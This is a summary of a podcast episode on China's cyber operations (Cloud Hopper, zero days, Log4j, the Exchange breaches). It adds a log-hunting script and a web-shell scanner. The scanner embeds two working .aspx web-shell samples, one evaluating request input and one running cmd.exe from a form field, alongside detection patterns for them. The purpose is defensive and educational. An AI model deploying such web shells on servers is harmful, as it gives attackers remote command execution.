To Catch a Thief: China’s Rise to Cyber Supremacy – Episode 6: The Gunslingers
Release Date: April 14, 2025
Produced by Rubrik in partnership with Pod People
Host: Nicole Perlroth
1. Introduction
In Episode 6, titled "The Gunslingers," host Nicole Perlroth traces the evolution of Chinese cyber operations from noisy, easily attributed intrusions to the work of elite operatives capable of strategic, stealthy attacks on targets worldwide. Perlroth interviews cybersecurity experts and insiders to uncover the motivations and methods behind China's ascent to cyber supremacy.
2. The Digital Ceasefire and Strategic Consolidation
Perlroth opens the episode with an 18-month digital lull that initially looked as though Chinese cyberattacks had subsided. The calm was deceptive. She explains, “In retrospect, it appears the PRC carefully studied the Snowden documents, got a look at the NSA signals intelligence, and asked, how do we get that?” (00:08)
During this period, the Chinese Communist Party (CCP) established the Standing Cyber Committee, aiming to emulate and improve on U.S. cyber operations. Far from observing a ceasefire, China was consolidating its capabilities, unifying the People's Liberation Army's (PLA) disparate hacking units under the newly formed Strategic Support Force, a structure modeled on U.S. Cyber Command.
3. Emergence of Elite MSS Hackers
A pivotal shift followed when responsibility for sensitive cyber operations moved from the PLA to the Ministry of State Security (MSS). Perlroth describes the MSS as “a sort of combination of the FBI and NSA,” responsible for both domestic and foreign espionage. Unlike the PLA, the MSS outsourced its most critical operations to elite hackers across China, many of them operating under the cover of cybersecurity firms.
"These hackers were no longer blasting into the building and announcing their presence," Perlroth notes, highlighting the stealthy nature of these new operatives (00:08).
John Hultquist, Mandiant's Chief Analyst, emphasizes the tighter operational security:
"They are now far more focused on their operational security, laying low, making it much harder for us to attribute them." (03:00)
4. Shift to Operational Security and Sophistication
Before 2015, Chinese Advanced Persistent Threats (APTs) were relatively easy to identify: their tradecraft was simple and repetitive, so attack style alone pointed at the actor. Perlroth recounts, “Before 2015, attributing Chinese APTs by their attack style... was a fairly straightforward practice.” (03:10)
However, by late 2016, this dynamic had dramatically changed. Kevin Mandia of Mandiant observes:
"We used to be able to bucketize the forensics... and rarely would you see a Chinese APT deploy advanced techniques or custom code." (03:35)
The change showed up as a surge of varied, novel attack methods, and attribution became steadily harder.
5. Operation Cloud Hopper: Exploiting MSPs Globally
One of the first signs of China's enhanced cyber prowess was Operation Cloud Hopper, a coordinated campaign against Managed Service Providers (MSPs), the firms that remotely administer IT for many client organizations. An MSP's credentials and remote-management tooling already reach into each of its clients' networks, so compromising one provider gave the hackers a path into thousands of downstream networks at once.
Perlroth details the extensive reach of these operations:
"They'd taken Rio Tinto's prospecting secrets and sensitive health research from Philips... They even managed to slip into NASA's Jet Propulsion Lab." (04:02)
Steve Stone, a cybersecurity expert, reflects on the sophistication of these attacks:
"They were able to go after only what they needed to... The gunslingers were incredibly hard to get out because we never knew what they were capable of." (09:08)
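The MSP pivot that made Cloud Hopper so effective can be hunted for from the client side: an MSP's remote-management account has a legitimate reason to appear in many tenants, but not from arbitrary source addresses and not fanning out across every client at once. The Python script below is an added example and is not from the episode; the log format, account names, address ranges and thresholds are constructed assumptions. It parses a handful of constructed remote-logon records and raises two kinds of alert: an MSP account arriving from outside the MSP's declared jump-host range, and an MSP account touching more tenants within an hour than a maintenance task plausibly needs.

```python
"""Hunt for abused MSP remote-management credentials in client logon logs.

Added example, not from the episode. Log format, account names, address
ranges and thresholds are constructed assumptions for illustration.
"""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample: one remote logon per line as a client's EDR/VPN might
# export it (timestamp, client tenant, account, source IP, logon type).
SAMPLE_LOG = r"""
2017-04-03T02:14:09Z tenant=acme-mining account=MSP\svc-rmm src=198.51.100.7 type=remote
2017-04-03T02:15:31Z tenant=acme-mining account=ACME\jdoe src=10.20.1.15 type=interactive
2017-04-03T02:16:02Z tenant=contoso-health account=MSP\svc-rmm src=198.51.100.7 type=remote
2017-04-03T02:19:47Z tenant=fabrikam-lab account=MSP\svc-rmm src=198.51.100.7 type=remote
2017-04-03T02:22:10Z tenant=northwind-energy account=MSP\svc-rmm src=198.51.100.7 type=remote
2017-04-03T02:25:55Z tenant=tailspin-water account=MSP\svc-rmm src=198.51.100.7 type=remote
2017-04-03T03:40:12Z tenant=acme-mining account=MSP\svc-rmm src=203.0.113.44 type=remote
2017-04-03T09:02:00Z tenant=contoso-health account=MSP\svc-patch src=198.51.100.9 type=remote
"""

# Assumed: the MSP's service accounts and the jump-host range they must come from.
MSP_ACCOUNTS = {r"msp\svc-rmm", r"msp\svc-patch"}
JUMP_HOSTS = [ipaddress.ip_network("198.51.100.0/24")]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) tenant=(?P<tenant>\S+) account=(?P<account>\S+) "
    r"src=(?P<src>\S+) type=(?P<type>\S+)$"
)


@dataclass(frozen=True)
class Logon:
    ts: datetime
    tenant: str
    account: str
    src: ipaddress.IPv4Address | ipaddress.IPv6Address
    kind: str


@dataclass(frozen=True)
class Alert:
    rule: str
    account: str
    detail: str


def parse_log(text: str) -> list[Logon]:
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable line: {line!r}")
        events.append(Logon(
            ts=datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
            tenant=m["tenant"],
            account=m["account"].lower(),   # normalise DOMAIN\user case
            src=ipaddress.ip_address(m["src"]),
            kind=m["type"],
        ))
    return events


def find_msp_abuse(events, msp_accounts, jump_hosts,
                   max_tenants: int = 3, window: timedelta = timedelta(hours=1)) -> list[Alert]:
    alerts: list[Alert] = []
    per_account: dict[str, list[Logon]] = defaultdict(list)
    for e in sorted(events, key=lambda x: x.ts):
        if e.account not in msp_accounts:
            continue            # ordinary user logons are out of scope here
        if not any(e.src in net for net in jump_hosts):
            alerts.append(Alert("untrusted-source", e.account,
                                f"{e.tenant} from {e.src} at {e.ts.isoformat()}"))
        per_account[e.account].append(e)

    # Fan-out: distinct tenants reached by one MSP account inside a sliding window.
    for account, evs in per_account.items():
        for i, first in enumerate(evs):
            tenants = {x.tenant for x in evs[i:] if x.ts - first.ts <= window}
            if len(tenants) > max_tenants:
                alerts.append(Alert("tenant-fanout", account,
                                    f"{len(tenants)} tenants within {window} starting {first.ts.isoformat()}"))
                break           # one alert per account is enough
    return alerts


def run_sample() -> list[Alert]:
    return find_msp_abuse(parse_log(SAMPLE_LOG), MSP_ACCOUNTS, JUMP_HOSTS)


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a.rule}] {a.account}: {a.detail}")
```

On the constructed sample the script raises one untrusted-source alert (the service account arriving from 203.0.113.44) and one fan-out alert (five tenants in twelve minutes). The thresholds are deliberately conservative; the point is that MSP accounts deserve their own baseline, separate from ordinary users, because their legitimate reach is exactly what an attacker inherits.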
6. The Zero Day Arms Race
A central element of China's cyber strategy is the discovery and stockpiling of zero day exploits: exploits for vulnerabilities that the software's vendor does not yet know about, so no patch exists when they are first used. Perlroth explains zero days as:
"They are holes in the foundation of a system... Once it's found, programmers have had zero days to fix it." (10:03)
Initially rare in Chinese APT attacks, the use of zero days surged dramatically post-2015. Kevin Mandia highlights this explosion:
"We had 32 zero days in 2019 exploited in the wild... In 2021, we hit 81." (13:11)
That count covers every in-the-wild zero day Mandiant tracked, not only Chinese ones, but the episode presents the rise as driven in large part by China's intensified investment in finding and deploying them.
7. China's Control Over Zero Days
Unlike Western intelligence agencies, which develop zero days in-house or buy them from brokers on the gray market, China requires that zero day discoveries be turned over to the state. Perlroth elaborates:
"In China, the CCP can simply force hackers to turn them over for free... they started forcing China's hackers to turn over their best finds." (16:23)
Jim Lewis, a China cyber liaison, explains the internal pressure on Chinese hackers:
"They were invited to drink tea at the local cop shop... It suggested to them that it's their patriotic duty to give Uncle Xi their hacking tools for free." (16:23)
This state-controlled approach effectively removes the gray market for zero days inside China and concentrates the country's offensive capability under government oversight.
8. High-Profile Zero Day Incidents
The episode recounts two zero day incidents that exemplify China's cyber tactics:
- Alibaba and Log4j (December 2021): A security engineer at Alibaba disclosed a severe zero day in Log4j, an open-source Java logging library embedded in an enormous number of applications, so a single bug became exposure for organizations everywhere. Jen Easterly, former director of CISA (the US Cybersecurity and Infrastructure Security Agency), called it “the most serious vulnerability” she had encountered (18:55).
- Microsoft Exchange attacks (2021): Chinese hackers exploited zero days in on-premises Microsoft Exchange servers, gaining covert access to email and leaving web shells behind as backdoors. John Hultquist describes the breach as “the most aggressive operation” he'd seen from China (22:43).
These incidents illustrate the scale and impact of China's zero day exploitation, which reached critical infrastructure and prompted unprecedented government responses.
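The “door left open” Hultquist describes was a set of web shells: attacker-written server pages dropped into the Exchange web root so that a plain HTTP request could run commands, which is what the FBI's later court-authorized operation removed. The Python script below is an added example, not from the episode, from Microsoft or from the FBI. It builds a constructed web-root tree in a temporary directory, flags .aspx files that both read request input and execute code, and moves them to a quarantine directory rather than deleting them so the evidence survives. The directory names, heuristics and sample file contents are assumptions; a production sweep should also compare the web root against the installer's known-good file inventory, since keyword heuristics miss obfuscated shells.

```python
"""Sweep a web root for .aspx web shells and quarantine what it finds.

Added example, not from the episode, Microsoft or the FBI. Directory names,
heuristics and sample file contents are constructed assumptions.
"""
from __future__ import annotations

import re
import shutil
import tempfile
from pathlib import Path

# A web shell reads attacker input from the request AND hands it to something
# that executes it. Requiring both keeps false positives down.
INPUT_RE = re.compile(r"Request\s*(\.Item\s*)?(\[|\.Form|\.QueryString|\.Headers)", re.I)
EXEC_RE = re.compile(r"\beval\s*\(|Process\.Start|\bCreateObject\s*\(|Assembly\.Load", re.I)

# Assumed list of directories the installer normally manages; a shell found
# here is reported with that context so a responder can prioritise it.
WATCHED_DIRS = ("aspnet_client", "owa/auth", "ecp/auth")

# Constructed sample web root: benign stand-ins, one decoy, and two shells.
SAMPLE_FILES = {
    "owa/auth/logon.aspx": '<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>',
    "ecp/auth/TimeoutLogout.aspx": '<%@ Page Language="C#" %>\n<% Response.Redirect("/owa/auth/logon.aspx"); %>',
    # reads input but only echoes it back encoded: must NOT be flagged
    "owa/auth/search.aspx": '<%@ Page Language="C#" %><% Response.Write(Server.HtmlEncode(Request.QueryString["q"])); %>',
    # one-line JScript shell: evaluates whatever arrives in parameter "a"
    "aspnet_client/system_web/help.aspx": '<%@ Page Language="Jscript" %><% eval(Request.Item["a"], "unsafe"); %>',
    # C# shell: spawns a command taken from a form field
    "owa/auth/current/themes/resources/logon.aspx": (
        '<%@ Page Language="C#" %><script runat="server">\n'
        'void Page_Load(){ System.Diagnostics.Process.Start("cmd.exe", "/c " + Request.Form["c"]); }\n'
        "</script>"
    ),
}


def build_sample_webroot() -> Path:
    """Write the constructed sample tree into a fresh temporary directory."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for rel, body in SAMPLE_FILES.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
    return root


def is_webshell(path: Path) -> bool:
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return False
    return bool(INPUT_RE.search(text) and EXEC_RE.search(text))


def scan_webroot(root: Path) -> list[tuple[Path, str]]:
    """Return (path, context) for every .aspx under root that looks like a shell."""
    hits = []
    for p in sorted(root.rglob("*.aspx")):
        if not is_webshell(p):
            continue
        rel = p.relative_to(root).as_posix()
        context = ("installer-managed dir" if any(rel.startswith(d + "/") for d in WATCHED_DIRS)
                   else "other dir")
        hits.append((p, context))
    return hits


def quarantine(hits: list[tuple[Path, str]], root: Path, qdir: Path) -> list[Path]:
    """Move flagged files out of the web root, keeping relative paths for forensics."""
    moved = []
    for p, _ in hits:
        dest = qdir / p.relative_to(root)
        dest.parent.mkdir(parents=True, exist_ok=True)
        shutil.move(str(p), str(dest))
        moved.append(dest)
    return moved


if __name__ == "__main__":
    root = build_sample_webroot()
    found = scan_webroot(root)
    for p, ctx in found:
        print(f"shell: {p.relative_to(root).as_posix()} ({ctx})")
    qdir = root.with_name(root.name + "-quarantine")
    print(f"quarantined {len(quarantine(found, root, qdir))} file(s) to {qdir}")
```

Quarantining instead of deleting is the deliberate choice here: removing the backdoor closes the door, but the file's timestamps, contents and location are what tell a responder when the intrusion started and which of the other incidents on the network it connects to.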
9. Government Responses and Policy Implications
In response to the severity of these attacks, the U.S. government took unprecedented measures. After the Microsoft Exchange breach, the Justice Department obtained one of the broadest search warrants in the FBI's history, authorizing the Bureau to reach into compromised Exchange servers and delete the web shells (backdoors) the attackers had left, without first notifying the owners. The operation removed backdoors only; it did not patch the servers, which remained the owners' responsibility.
The operation was controversial. Jen Easterly's advice at the time applied regardless: “Everyone should assume that they are exposed and vulnerable now.” (18:55) The incident prompted a reevaluation of cybersecurity policy and underscored the need for robust defenses against state-sponsored threats.
Kevin Mandia comments on the escalating cyber aggression:
"China has brought the A game and they've changed... their techniques are far more innovative and improved than even three years ago." (25:46)
10. Broader Geopolitical Context and Future Threats
The episode connects China's cyber aggression to broader geopolitical developments, notably Russia's cyberattacks on Ukraine's power grid, which marked a shift from clandestine espionage to overt, disruptive attacks and signaled a new era in cyber warfare.
Jen Easterly, former director of CISA, emphasizes the deterrence implications:
"The defense of Ukraine is the deterrence of China... it's about holding US critical infrastructure at risk to deter our ability to marshal military might and citizen will." (29:13)
Experts worry that China could mount similar attacks on U.S. critical infrastructure, with multiple sectors such as energy, water and communications disrupted at the same time. An unnamed expert describes “an everything everywhere all at once scenario” in which a major cyberattack knocks out numerous services across the American landscape (30:50).
11. Conclusion
Episode 6, "The Gunslingers," provides a comprehensive exploration of China's advanced cyber operations and their implications for global security. Through detailed accounts and expert insights, Perlroth illuminates the strategic maneuvers that have positioned China as a dominant cyber power. The episode serves as a stark reminder of the evolving threats in the digital realm and the pressing need for international vigilance and robust cybersecurity measures.
Notable Quotes:
- “They are now far more focused on their operational security, laying low, making it much harder for us to attribute them.”
  — John Hultquist, Mandiant's Chief Analyst (03:00)
- “We used to be able to bucketize the forensics... and rarely would you see a Chinese APT deploy advanced techniques or custom code.”
  — Kevin Mandia, Mandiant (03:35)
- “This was the most aggressive operation... You essentially left a door open on millions of systems.”
  — John Hultquist, Mandiant (22:44)
- “The log4j vulnerability is the most serious vulnerability that I have seen in my decades long career.”
  — Jen Easterly, Former Director of CISA (18:55)
- “China has brought the A game and they've changed... their techniques are far more innovative and improved.”
  — Kevin Mandia, Mandiant (25:46)
Production Credits:
Written and Produced by Nicole Perlroth and Rebecca Chasson
Additional Thanks: Hannah Pedersen, Sam Gabauer, and Amy Machado
Editing and Sound Design: Morgan Foose and Carter Wogan
For more insights into China's cyber strategies and their global implications, listen to the full episode of "To Catch a Thief: China’s Rise to Cyber Supremacy."
